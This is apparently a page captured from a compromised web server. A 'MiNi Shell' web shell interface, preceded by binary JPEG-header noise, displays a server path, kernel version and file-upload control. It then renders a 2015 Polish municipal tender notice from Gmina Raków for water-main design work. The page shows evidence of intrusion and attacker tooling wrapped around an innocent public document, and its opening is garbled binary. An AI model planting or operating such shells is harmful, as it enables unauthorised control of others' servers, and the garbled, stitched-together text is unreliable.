JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150909/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150909/234550-N-2015.html

<p class="kh_header"><b>Raków: Opracowanie dokumentacji projektowej 
na zadanie pn.  Budowa wodociągu Bardo</b><br>
<b>Numer ogłoszenia: 234550 - 2015; data zamieszczenia: 09.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Raków , ul. Ogrodowa 1, 26-035 Raków, woj. świętokrzyskie, tel. 41 3535018, faks 41 3535018.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowej 
na zadanie pn.  Budowa wodociągu Bardo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Opracowanie dokumentacji projektowej  na zadanie  
pn.Budowa wodociągu Bardo oraz uzyskanie niezbędnych opinii, uzgodnień, sprawdzeń, decyzji, opracowań i zatwierdzeń umożliwiających kompleksową realizację inwestycji wraz 
z uzyskaniem decyzji o   pozwoleniu na budowę.    

1.	Zakres opracowania dokumentacji projektowej  obejmuje :

-kompletne projekty: budowlany, wykonawczy  - opracowane zgodnie z obowiązującymi przepisami umożliwiającymi kompleksową realizację inwestycji  z niezbędnymi  opiniami,  uzgodnieniami, opracowaniami, zatwierdzeniami  wraz z uzyskaniem decyzji o pozwoleniu na budowę - w ilości 6 egz.
-przedmiary  robót  i kosztorysy  inwestorskie - w ilości 2 egz.
-specyfikacje techniczne wykonania i odbioru robót budowlanych - w ilości 2 egz.
-informację dotyczącą bezpieczeństwa i ochrony zdrowia  

Szczegółowy zakres opracowania dokumentacji projektowej obejmuje:
-Wykonanie map do celów projektowych
-pozyskanie zgód właścicieli nieruchomości (zgody na przejście siecią, zgody na przyłącza 	oraz rezygnacje  w przypadku braku zgody właściciela na przejście - sieć,przyłącze). 
-uzyskanie decyzji o środowiskowych uwarunkowaniach wraz z opracowaniem 	niezbędnych dokumentów do jej wydania
-Opracowanie operatów wodno - prawnych wraz z uzyskaniem pozwoleń wodno - prawnych
-Opracowanie dokumentacji  geotechnicznej,opinii geologicznej zgodnie z obowiązującymi 	w tym zakresie przepisami
-kompletny projekt budowlany, wykonawczy -  opracowane wg. obowiązujących przepisów, 	umożliwiających  kompleksową realizację  inwestycji,
-przedmiary i kosztorysy inwestorskie z podziałem na poszczególne elementy (przyłącza, 	sieć, obiekty)
-szczegółowe specyfikacje techniczne wykonania i odbioru robót
-informację dotyczącą bezpieczeństwa i ochrony zdrowia
-Inwentaryzację zieleni   zawierającą:   wskazanie ilości , rodzaju i lokalizacji drzew oraz 	krzewów przeznaczonych do wycinki, z naniesieniem na mapę w skali 1:500,  	tabelaryczny  wykaz  gatunków  drzew  i  krzewów  przeznaczonych  do wycinki
oraz inne niezbędne  opinie, uzgodnienia, sprawdzenia, decyzje, opracowania  i zatwierdzenia umożliwiające kompleksową realizację inwestycji wraz z uzyskaniem decyzji 
o   pozwoleniu na budowę,
-Wykonawca zobowiązany jest do wytypowania nieruchomości pod posadowienie
 ewentualnych obiektów i zawarcie wstępnych zgód z właścicielami gruntu jak również   okazania projektu mieszkańcom i spisania protokołu z okazania dokumentacji,
-Wersja elektroniczna dokumentacji - 2 egz.  
Dokumentację projektową należy wykonać zgodnie z obowiązującymi  przepisami oraz zasadami wiedzy technicznej, miejscowym planem zagospodarowania przestrzennego gminy Raków, warunkami technicznymi (z uwzględnieniem zmian w przepisach w trakcie realizacji zamówienia)
a w szczególności:
-ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych
-ustawą z dnia 7 lipca 1994 r. Prawo budowlane
-Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania 	metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów 	prac 	projektowych oraz planowanych kosztów robót budowlanych określonych 
	w programie funkcjonalno -użytkowym ( Dz. U. z 2004 r. Nr 130  poz. 1389)
-Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 roku w 	sprawie 	szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji 	technicznych 	wykonania i odbioru robót budowlanych oraz programu funkcjonalno 
	 -użytkowego (t.j. Dz. U. z 2013 r.  poz. 1129),
-Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 	kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U.
 	z 2012, poz. 462 z późn. zm.)
-Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 	kwietnia 2012 r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów 	budowlanych (Dz. U z 2012 r. poz. 463)
Kompletna dokumentacja projektowa objęta przedmiotem zamówienia musi  umożliwiać:
-przeprowadzenie postępowania o udzielenie zamówienia publicznego na wyłonienie wykonawcy robót zgodnie z ustawą Prawo zamówień publicznych).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
	Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków 	udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże , że w okresie  ostatnich trzech 	lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 	krótszy  - w tym okresie wykonał należycie co najmniej dwie usługi polegające na 	opracowaniu dokumentacji projektowej-projektu budowlanego  w zakresie sieci: 	wodociągowych lub/ i  kanalizacji sanitarnej lub/i kanalizacji deszczowej o łącznej wartości 	co najmniej 80 000 zł - brutto wraz z podaniem ich wartości, przedmiotu, dat wykonania i  podmiotów, na rzecz których usługi zostały wykonane , oraz załączeniem dowodów, czy zostały wykonane należycie. Na potwierdzenie spełniania niniejszego warunku wykonawcy złożą określone w ogłoszeniu i SIWZ oświadczenia lub dokumenty.
Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń lub dokumentów, uwzględniając zapisy art. 26 ust. 3 ustawy, wg formuły spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków udziału 
w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie.
Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków udziału 
w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo warunku w tym zakresie. 
Warunek ten zostanie spełniony, na podstawie oświadczenia  o spełnieniu warunków 	udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych złożonego 	przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - dodatkowy okres gwarancji i rękojmi - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ust. 1 ustawy zamawiający dopuszcza możliwość dokonywania nieistot-nych zmian zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy. 
2.	Zamawiający dopuszcza, jeżeli uzna za uzasadnione zmiany postanowień zawartej umowy w stosunku do treści oferty  na podstawie której dokonano wyboru wykonawcy w szczególnie uza-sadnionych przypadkach, a konieczność takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego.
3.	Za zgodą zamawiającego dopuszcza się  możliwość wprowadzenia istotnych zmian posta-nowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wyko-nawcy na podstawie art. 144 ust. 1 ustawy w przypadku wystąpienia poniższych okoliczności:
3.1. Zmiana terminu wykonania przedmiotu umowy za obopólną zgodą stron, w następujących przypadkach:
a) wystąpienia zamówień dodatkowych niezbędnych do prawidłowego wykonania zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwych do przewi-dzenia i które mają wpływ na termin realizacji zamówienia.
b) odmowy wydania przez organy administracji lub inne podmioty wymaganych decyzji, odstępstw od decyzji, warunków, zezwoleń, uzgodnień z przyczyn niezawinionych od Wykonawcy,
c) niezależne od Wykonawcy przedłużanie się postępowań w uzyskaniu od instytucji , urzędów niezbędnych  warunków, zezwoleń, uzgodnień, decyzji itp. z przyczyn niezależnych od Wykonaw-cy.
d) zaistnienie okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych  sytuacja finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
e) gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy  okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutku-jąca brakiem możliwości należytego wykonania umowy,
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych wyżej,  termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do wykonania przedmiotu umo-wy  w sposób należyty, nie dłuższy jednak niż okres trwania tych okoliczności,  bez zwiększenia wynagrodzenia wykonawcy określonego w umowie.  
3.2 Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
- zmiana osób, wskazanych w ofercie przy pomocy których Wykonawca realizuje przedmiot umowy, pod warunkiem,  że następca/cy będą posiadali uprawnienia co najmniej jak poprzednik/cy.
Zmiana osób podanych w ofercie wykonawcy, przy pomocy których Wykonawca realizuje przed-miotem umowy, nie wymaga aneksu do umowy, a dla skutecznej zmiany niezbędne jest uzyskanie zgody Zamawiającego na proponowaną osobę.
- siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
- gdy z przyczyn organizacyjnych konieczna będzie zmiana osób upoważnionych do dokonywania czynności,
- zmiana danych teleadresowych określonych w niniejszej umowie
- zmiana wynagrodzenia wykonawcy w przypadku urzędowych zmian w obowiązujących przepi-sach podatkowych, w tym zmiany podatku VAT, 
- zmiany obowiązującego prawa, powodujące, że realizacja przedmiotu umowy w niezmienionej postaci stanie się niecelowa.
4.  Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyra-zić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
W przypadku każdej zmiany o których  mowa powyżej po stronie wnoszącego propozycję
zmian, 	leży udokumentowanie powstałej okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.rakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Raków, ul. Ogrodowa 1, 26-035 Raków. Cena 10 PLN/szt., płatna przelewem na konto: Bank Spółdzielczy o/Raków Nr 85 8521 1016 2002 7004 7193 0078..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2015 godzina 10:00, miejsce: Urząd Gminy w Rakowie , ul. Ogrodowa 1, 26-035 Raków sekretariat - pokój nr 14 ( I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com